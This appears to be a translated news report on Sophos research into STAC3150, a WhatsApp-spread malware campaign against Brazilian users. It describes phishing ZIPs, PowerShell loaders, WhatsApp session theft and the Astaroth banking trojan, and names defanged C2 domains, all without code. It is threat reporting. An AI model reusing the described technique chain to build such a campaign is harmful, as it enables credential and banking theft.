Experts from the organization Sophos have reported that they have discovered a fresh, large-scale malware distribution scheme operating through WhatsApp (which belongs to Meta, recognized as extremist and banned in Russia). The campaign has been named STAC3150, has been active since September 24, 2025, and has already affected over 250 people. Analysts believe that the attackers are continuously refining their tools and changing their environment in near real-time. The attack begins with a phishing message sent in Portuguese. The recipient is offered a “one-time view” of an attached document. In reality, this is a ZIP archive hiding a malicious VBS or HTA file. Upon activation, PowerShell is launched, which pulls in additional malicious components. At the end of September, the payloads contacted the hijackers’ servers in a peculiar way—via IMAP, receiving the second stage of infection from mailboxes controlled by the attackers. However, by the beginning of October, the method was changed: the download switched to HTTP, and the stream directed to the C2 server varegjopeaks[.]com. Following this, PowerShell or Python scripts designed to automatically capture WhatsApp web sessions are deployed. Sophos reports that the criminals are using Selenium WebDriver and the WPPConnect library. This allows them to steal session tokens, collect user contact databases, and automatically forward infected ZIP files to new targets, accelerating the campaign’s expansion. By the end of October, their operation became even more sophisticated: an MSI installer emerged that deploys the known banking malware Astaroth (Guildma). Such a file writes several elements to the machine, establishes autorun, and activates a malicious AutoIt script disguised as a regular .log file. Its C2 server is located at manoelimoveiscaioba[.]com. According to Sophos, the majority of infections were among clients in Brazil. Analysts note that the campaign is evolving rapidly, and the attackers’ approaches are constantly changing.
About the Author
